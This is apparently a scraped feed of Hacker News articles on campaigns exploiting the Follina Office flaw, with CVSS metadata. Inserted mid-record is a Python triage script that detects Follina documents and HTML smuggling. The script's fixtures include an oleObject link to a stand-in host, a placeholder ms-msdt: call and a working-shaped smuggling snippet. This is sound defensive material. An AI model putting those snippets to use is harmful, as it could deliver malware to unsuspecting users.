2022.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwAToWSwhUxNkqZBnap1saOcSptSsRKdR2PCuiQamQfKMMtK9-B7ynmiF-gdlmDCOj8RDPb54wYwMRwiIXBFKTwDGotN-y7Rlc4SLlXv-jQUmbV7_4igIalD1e_sKbpjs6ZZYEUwsTet-4KSgvQpaxTA0AqjnN7-DuVbePjhJNOznNM8ypuas5E4_D/s728-e100/google-malware.jpg>)\n\nOne of the prominent campaigns undertaken by the group in June 2022 entailed the abuse of [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the Windows operating system to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts in media and critical infrastructure entities.\n\nBut this appears to be a part of a series of attacks that commenced way back in late April 2022, when the group conducted an email phishing campaign to deliver [AnchorMail](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>) (aka LackeyBuilder), a variant of the TrickBot group's AnchorDNS implant that uses SMTP for command-and-control.\n\nSubsequent phishing campaigns distributing IcedID and Cobalt Strike have been directed against Ukrainian organizations, repeatedly striking the hospitality sector, some of which impersonated the National Cyber Police of Ukraine or representatives of Elon Musk and StarLink.\n\nAround mid-May, UAC-0098 is also said to have leveraged a compromised account of a hotel in India to send malware-laced attachments to organizations working in the hospitality industry in Ukraine, before expanding to humanitarian NGOs in Italy.\n\nSimilar attacks have also been observed against entities in the technology, retail, and government sectors, with the IcedID binary concealed as a Microsoft update to trigger the infection. Post-exploitation steps carried out following a successful compromise have not been identified.\n\nUAC-0098 is far from the only Conti-affiliated hacking group to set its sights on Ukraine since the onset of the war. 
In July 2022, IBM Security X-Force [disclosed](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) that the TrickBot gang orchestrated six different campaigns to systematically target the country with a plethora of malware.\n\n\"UAC-0098 activities are representative examples of blurring lines between financially motivated and government backed groups in Eastern Europe, illustrating a trend of threat actors changing their targeting to align with regional geopolitical interests,\" Bureau said.\n\n\"The group demonstrates strong interest in breaching businesses operating in the hospitality industry of Ukraine, going as far as launching multiple distinct campaigns against the same hotel chains.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-07T14:42:00", "type": "thn", "title": "Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-14T13:52:54", "id": "THN:8C7C0BBCE90D4B2076F46E011BAB609D", "href": "https://thehackernews.com/2022/09/some-members-of-conti-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-22T06:04:11", "description": "A threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.\n\nRecorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as [Colibri loader](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and [Warzone RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria>).\n\nThe attacks are said to be an expansion of the [same campaign](<https://cert.gov.ua/article/405538>) that previously distributed [DCRat](<https://thehackernews.com/2022/05/experts-sound-alarm-on-dcrat-backdoor.html>) (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine.\n\nSandworm is a [destructive Russian threat group](<https://thehackernews.com/2020/10/russian-hackers.html>) that's best known for operations such as the 2015 and 2016 attacks on the Ukrainian electrical grid and the 2017 NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency.\n\nThe adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical substations, computers and networking equipment for the third time in Ukraine earlier this April through a [new variant of a piece of malware](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) known as Industroyer.\n\nSince Russia's invasion of Ukraine, the group has also unleashed numerous other attacks, including [leveraging the Follina vulnerability](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to breach media entities in the Eastern European nation.\n\nIn addition, it was uncovered as the mastermind behind a new modular botnet called [Cyclops Blink](<https://thehackernews.com/2022/04/fbi-shut-down-russia-linked-cyclops.html>) that enslaved internet-connected firewall devices and routers from WatchGuard and ASUS.\n\nThe U.S. 
government, for its part, has announced up to [$10 million in rewards](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) for information on six hackers associated with the APT group for participating in malicious cyber activities against U.S. critical infrastructure.\n\n\"A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware,\" Recorded Future [said](<https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine>).\n\nThe attacks entail fraudulent domains hosting a web page purportedly about the \"Odesa Regional Military Administration,\" while an encoded ISO image payload is stealthily delivered via a technique referred to as [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>).\n\nHTML smuggling, as the name suggests, is an evasive malware delivery technique that leverages legitimate HTML and JavaScript features to reconstruct the payload inside the victim's browser, so that no recognisable file crosses the network for conventional security controls to inspect.\n\nRecorded Future also said it identified points of similarity with another [HTML dropper attachment](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) put to use by the APT29 threat actor in a campaign aimed at Western diplomatic missions between May and June 2022.\n\nEmbedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine.\n\nThe execution of the LNK file also launches an innocuous decoy document \u2013 an application for Ukrainian citizens to request monetary compensation and fuel discounts \u2013 in an attempt to conceal the malicious operations.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-20T12:56:00", "type": "thn", "title": "Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-22T06:02:31", "id": "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "href": "https://thehackernews.com/2022/09/russian-sandworm-hackers-impersonate.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T15:35:06", "description": 
"A new set of attacks exploiting the Microsoft Office \"Follina\" vulnerability to target government entities in Europe and the U.S. has been attributed to a suspected state-aligned threat actor.\n\nEnterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked as [CVE-2022-30190](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) (CVSS score: 7.8). No fewer than 1,000 phishing messages containing a lure document were sent to the targets.\n\n\"This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253,\" the company [said](<https://twitter.com/threatinsight/status/1532830739208732673>) in a series of tweets.\n\nThe payload, which manifests in the form of a PowerShell script, is Base64-encoded and functions as a downloader to retrieve a second PowerShell script from a remote server named \"seller-notification[.]live.\"\n\n\"This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil[tration] to 45.77.156[.]179,\" the company added.\n\nThe phishing campaign has not been linked to a previously known group, but Proofpoint said it was mounted by a nation-state actor, based on the specificity of the targeting and the PowerShell payload's wide-ranging reconnaissance capabilities.\n\nThe development follows [active exploitation attempts](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by a Chinese threat actor tracked as TA413 to deliver weaponized ZIP archives with malware-rigged Microsoft Word documents.\n\nThe Follina vulnerability, in which a crafted document causes Office to invoke the \"ms-msdt:\" protocol URI scheme and so pass attacker-controlled parameters to the Microsoft Windows Support Diagnostic Tool (MSDT), which ends up running the attacker's command, remained unpatched at the time of publication, with Microsoft urging customers to disable the protocol handler as a workaround.\n\nIn the absence of a security update, 0patch released an [unofficial fix](<https://blog.0patch.com/2022/06/free-micropatches-for-follina-microsoft.html>) to block ongoing attacks against Windows systems that target the MSDT vulnerability.\n\n\"It doesn't matter which version of Office you have installed, or if you have Office installed at all: the vulnerability could also be exploited through [other attack vectors](<https://twitter.com/0xBacco/status/1531599168363548672>),\" 0patch's Mitja Kolsek said.\n\n\"Proofpoint continues to see targeted attacks leveraging CVE-2022-30190,\" Sherrod DeGrippo, vice president of threat research, said in a statement shared with The Hacker News.\n\n\"The extensive reconnaissance conducted by the second PowerShell script demonstrates an actor interested in a large variety of software on a target's computer. This, coupled with the tight targeting of European government and local U.S. governments, led us to suspect this campaign has a state aligned nexus.\"\n
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T02:54:00", "type": "thn", "title": "State-Backed Hackers Exploit Microsoft 'Follina' Bug to Target Entities in Europe and U.S", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:27:16", "id": "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "href": "https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T03:59:01", "description": "Russian threat actors capitalized on the [ongoing 
conflict](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) against Ukraine to distribute Android malware camouflaged as an app for pro-Ukrainian hacktivists to launch distributed denial-of-service (DDoS) attacks against Russian sites.\n\nGoogle Threat Analysis Group (TAG) attributed the malware to Turla, an advanced persistent threat also known as Krypton, Venomous Bear, Waterbug, and Uroburos, and linked to Russia's Federal Security Service (FSB).\n\n\"This is the first known instance of Turla distributing Android-related malware,\" TAG researcher Billy Leonard [said](<https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/>). \"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.\"\n\nIt's worth noting that the [onslaught](<https://thehackernews.com/2022/04/microsoft-documents-over-200.html>) of [cyberattacks](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) in the immediate aftermath of Russia's unprovoked invasion of Ukraine prompted the latter to [form an IT Army](<https://thehackernews.com/2022/03/both-sides-in-russia-ukraine-war.html>) to stage counter-DDoS attacks against Russian websites. 
The goal of the Turla operation, it appears, is to use this volunteer-run effort to their own advantage.\n\nThe [decoy app](<https://www.virustotal.com/gui/file/3c62b24594ec3cacc14bdca068a0277e855967210e92c2c17bcf7c7d0d6b782a/>) was hosted on a domain masquerading as the [Azov Regiment](<https://en.wikipedia.org/wiki/Azov_Regiment>), a unit of the National Guard of Ukraine, calling on people from around the world to fight \"Russia's aggression\" by initiating a denial-of-service attack on the web servers belonging to \"Russian websites to overwhelm their resources.\"\n\nGoogle TAG said the actors drew inspiration from another Android app distributed through a website named \"stopwar[.]pro\" that's also designed to conduct DoS attacks by continually sending requests to the target websites.\n\nThat said, the actual number of times the malicious Cyber Azov app was installed is minuscule, posing no major impact on Android users.\n\nAdditionally, the Sandworm group (aka Voodoo Bear) has been connected to a separate set of malicious activities leveraging the [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to send links pointing to Microsoft Office documents hosted on compromised websites targeting media entities in Ukraine.\n\nUAC-0098, a threat actor that CERT-UA last month warned of [distributing tax-themed documents](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) carrying a Follina exploit, has also been assessed to be a former initial access broker with ties to the [Conti 
group](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) and in charge of disseminating the IcedID banking trojan.\n\nOther kinds of cyber activity include credential phishing attacks mounted by an adversary referred to as COLDRIVER (aka Callisto) aimed at government and defense officials, politicians, NGOs and think tanks, and journalists.\n\nThese involve sending emails that either contain the phishing domain directly or link to documents hosted on Google Drive and Microsoft OneDrive which, in turn, link to an attacker-controlled website designed to steal passwords.\n\nThe [latest developments](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) are yet another indication that Russian threat actors continue to refine both their targeting and their techniques.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-20T05:58:00", "type": "thn", "title": "Russian Hackers Tricked Ukrainians with Fake \"DoS Android Apps to Target Russia\" \u2014 The Hacker News", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-21T03:06:16", "id": "THN:7A6D54BC76D090840197DDF871D59731", "href": "https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-13T06:20:03", "description": "Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the [XWorm malware](<https://thehackernews.com/2023/04/new-qbot-banking-trojan-campaign.html>) to targeted systems.\n\nSecuronix, which is tracking the activity cluster under the name **MEME#4CHAN**, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany.\n\n\"The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims,\" security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov [said](<https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/>) in a new analysis shared with The Hacker News.\n\nThe report builds on [recent findings](<https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla>) from Elastic Security Labs, which revealed the threat actor's reservation-themed lures to deceive victims into opening malicious documents capable of delivering XWorm and Agent Tesla payloads.\n\nThe attacks begin with phishing emails that distribute decoy Microsoft Word documents which, instead of using macros, weaponize the [Follina vulnerability](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) (CVE-2022-30190, CVSS score: 7.8) to drop an obfuscated PowerShell script.\n\nFrom there, the PowerShell script is used to bypass the Antimalware Scan Interface ([AMSI](<https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal>)), disable Microsoft Defender, establish persistence, and ultimately launch the .NET binary containing XWorm.\n\nInterestingly, one of the variables in the PowerShell script is named \"$CHOTAbheem,\" which is likely a reference to [_Chhota Bheem_](<https://en.wikipedia.org/wiki/Chhota_Bheem>), an Indian animated comedy adventure television series.\n\n\"Based on a quick check, it appears that the individual or group responsible for the attack could have a Middle Eastern/Indian background, although the final attribution has not yet been confirmed,\" the researchers told The Hacker News, pointing out that such keywords could also be used as a cover.\n\nXWorm is a [commodity malware](<https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/>) that's advertised for sale on underground forums and comes with a wide range of features that allow it to siphon sensitive information from infected hosts.\n\nThe malware is also a Swiss Army knife in that it can perform clipper, DDoS, and ransomware operations, spread via USB, and drop additional malware.\n\nThe exact origins of the threat actor are currently unclear, although Securonix 
said the attack methodology shares artifacts similar to those of [TA558](<https://thehackernews.com/2022/08/cybercrime-group-ta558-targeting.html>), which has been observed striking the hospitality industry in the past.\n\n\"Though phishing emails rarely use Microsoft Office documents since Microsoft made the decision to [disable macros by default](<https://thehackernews.com/2022/07/hackers-opting-new-attack-methods-after.html>), today we're seeing proof that it is still important to be vigilant about malicious document files, especially in this case where there was no VBscript execution from macros,\" the researchers said.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-12T21:00:00", "type": "thn", "title": "XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-05-13T05:13:09", 
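Added example, written for this page and not taken from The Hacker News, Proofpoint, Securonix, Recorded Future or Microsoft: a static triage script for the two delivery stages the articles above describe, the macro-less Office document whose oleObject relationship points at a remote HTML file (the Proofpoint and Securonix campaigns), and the HTML stage that either hands an "ms-msdt:" URI to the protocol handler or reconstructs a payload in the browser (the HTML smuggling used by Sandworm). The package fixture, the hostname stage.example, the relationship Ids and the encoded bytes are all constructed placeholders, not indicators from any campaign.

```python
# Added example for this page (not code from The Hacker News, Proofpoint, Securonix,
# Recorded Future or Microsoft): static triage for the two Follina delivery stages the
# articles describe. Every fixture below is constructed for the demonstration; the
# hostname, relationship Ids and encoded bytes are placeholders, not campaign indicators.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)
# An HTML smuggling stage needs a decode primitive and a file-drop primitive together;
# either one alone is common in benign pages, so only the pair is reported.
DECODE_HINTS = ("atob(", "fromCharCode(")
DROP_HINTS = ("msSaveOrOpenBlob", "createObjectURL(", ".download")
OOXML_EXT = (".docx", ".docm", ".dotm", ".xlsx", ".xlsm", ".pptx")


def scan_ooxml(package: bytes) -> list:
    """Findings for an Office Open XML package: VBA storage, external oleObject
    relationships (the Follina document shape), and any literal ms-msdt: string."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            blob = z.read(name)
            if name.lower().endswith("vbaproject.bin"):
                findings.append(f"vba: {name}")
            if name.endswith(".rels"):
                root = ET.fromstring(blob)
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                        findings.append(f"external oleObject: {name} -> {rel.get('Target')}")
            if MSDT_RE.search(blob):
                findings.append(f"ms-msdt: in {name}")
    return findings


def scan_html(html: str) -> list:
    """Findings for an HTML stage: an ms-msdt: URI, or decode plus drop primitives."""
    findings = []
    if MSDT_RE.search(html.encode("utf-8", "replace")):
        findings.append("ms-msdt: URI")
    decode = [h for h in DECODE_HINTS if h in html]
    drop = [h for h in DROP_HINTS if h in html]
    if decode and drop:
        findings.append("html smuggling: " + ", ".join(decode + drop))
    return findings


def triage(name: str, data: bytes) -> list:
    """Route a file to the matching scanner by extension; other types are out of scope."""
    lower = name.lower()
    if lower.endswith(OOXML_EXT):
        return scan_ooxml(data)
    if lower.endswith((".htm", ".html")):
        return scan_html(data.decode("utf-8", "replace"))
    return []


def rels_xml(entries: str) -> str:
    return f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">{entries}</Relationships>'


def build_package(rels: str) -> bytes:
    """Constructed minimal package holding only the parts the scanner inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


STYLES_REL = ('<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument'
              '/2006/relationships/styles" Target="styles.xml"/>')
# Benign fixture: one internal relationship, no macros.
BENIGN_DOCX = build_package(rels_xml(STYLES_REL))
# Follina-shaped fixture: no macros either, but an oleObject link to a remote HTML file.
SUSPECT_DOCX = build_package(rels_xml(
    STYLES_REL
    + f'<Relationship Id="rId2" Type="{OLE_REL}" Target="http://stage.example/index.htm" TargetMode="External"/>'
))
# Constructed HTML stages: a placeholder ms-msdt: invocation, a smuggling page that
# decodes bytes and clicks a download link, and a benign page that only decodes.
MSDT_HTML = '<script>window.location.href = "ms-msdt:/id EXAMPLE-ARGUMENTS";</script>'
SMUGGLE_HTML = (
    '<script>var raw = atob("UEsDBA==");'
    'var b = new Blob([raw], {type: "application/octet-stream"});'
    'var a = document.createElement("a");a.href = URL.createObjectURL(b);'
    'a.download = "lure.iso";a.click();</script>'
)
PLAIN_HTML = '<p>Decoded greeting:</p><script>console.log(atob("aGk="));</script>'

if __name__ == "__main__":
    for label, data in (("benign.docx", BENIGN_DOCX), ("suspect.docx", SUSPECT_DOCX),
                        ("msdt.htm", MSDT_HTML.encode()), ("smuggle.htm", SMUGGLE_HTML.encode()),
                        ("plain.htm", PLAIN_HTML.encode())):
        print(f"{label}: {triage(label, data) or 'clean'}")
```

Run it directly to print the verdicts for the fixtures, or feed real samples through triage(). The ms-msdt: check is a plain substring match, so an actor who assembles the scheme string at runtime in JavaScript will not trip it; the external oleObject relationship, which the package format has to declare in the clear in a .rels part, is the more robust of the two signals, and the vbaProject.bin check is there to make the point of the Securonix article: a document with no macros at all can still carry the whole chain.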
"id": "THN:856F9A41F44F9B2C95A68501B0D1B5A7", "href": "https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-09T15:01:41", "description": "The threat actor known as **Asylum Ambuscade** has been observed straddling cybercrime and cyber espionage operations since at least early 2020.\n\n\"It is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North America and Europe,\" ESET [said](<https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/>) in an analysis published Thursday. \"Asylum Ambuscade also does espionage against government entities in Europe and Central Asia.\"\n\nAsylum Ambuscade was [first documented](<https://thehackernews.com/2022/03/hackers-try-to-hack-european-officials.html>) by Proofpoint in March 2022 as a nation-state-sponsored phishing campaign that targeted European governmental entities in an attempt to obtain intelligence on refugee and supply movement in the region.\n\nThe goal of the attackers, per the Slovak cybersecurity firm, is to siphon confidential information and web email credentials from official government email portals.\n\nThe attacks start off with a spear-phishing email bearing a malicious Excel spreadsheet attachment that, when opened, either runs malicious VBA code or exploits the Follina vulnerability ([CVE-2022-30190](<https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html>)) to download an MSI package from a remote server.\n\nThe installer, for its part, deploys a downloader written in Lua called SunSeed (or its Visual Basic Script equivalent) that, in turn, retrieves AutoHotkey-based malware known as AHK Bot from a remote server.\n\nWhat's notable about Asylum Ambuscade is its cybercrime spree that has claimed over 4,500 victims across the world since January 2022, with a majority of them located in North America, Asia, Africa, Europe, and South America.\n\n\"The targeting is very wide and mostly includes individuals, cryptocurrency traders, and small and medium businesses (SMBs) in various verticals,\" ESET researcher Matthieu Faou said.\n\nWhile one aspect of the attacks is designed to steal cryptocurrency, the targeting of SMBs is likely an attempt to monetize the access by selling it to other cybercriminal groups for illicit profits.\n\nThe compromise chain follows a similar pattern barring the initial intrusion vector, which entails the use of a rogue Google Ad or a traffic direction system (TDS) to redirect potential victims to a bogus website delivering a malware-laced JavaScript file.\n\nThe attacks have also made use of a Node.js version of AHK Bot codenamed NODEBOT that's then used to download plugins responsible for taking screenshots, plundering passwords, gathering system information, and installing additional trojans and stealers.\n\nGiven the almost identical attack chains across cybercrime and espionage efforts, it's suspected that \"Asylum Ambuscade is a cybercrime group that is doing some cyber espionage on the side.\"\n\nThe overlaps also extend to another activity cluster dubbed [Screentime](<https://thehackernews.com/2023/02/hackers-targeting-us-and-german-firms.html>) that's known to target companies in the U.S. and Germany with bespoke malware designed to steal confidential information. Proofpoint is tracking the threat actor under the name TA866.\n\n\"It is quite unusual to catch a cybercrime group running dedicated cyberespionage operations,\" Faou said, making it somewhat of a rarity in the threat landscape.\n
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-09T13:37:00", "type": "thn", "title": "Asylum Ambuscade: A Cybercrime Group with Espionage Ambitions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-06-09T13:37:53", "id": "THN:273B5BCEB3A6EC52EA8B8BB5D09A21BF", "href": "https://thehackernews.com/2023/06/asylum-ambuscade-cybercrime-group-with.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T03:58:26", "description": "A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented 
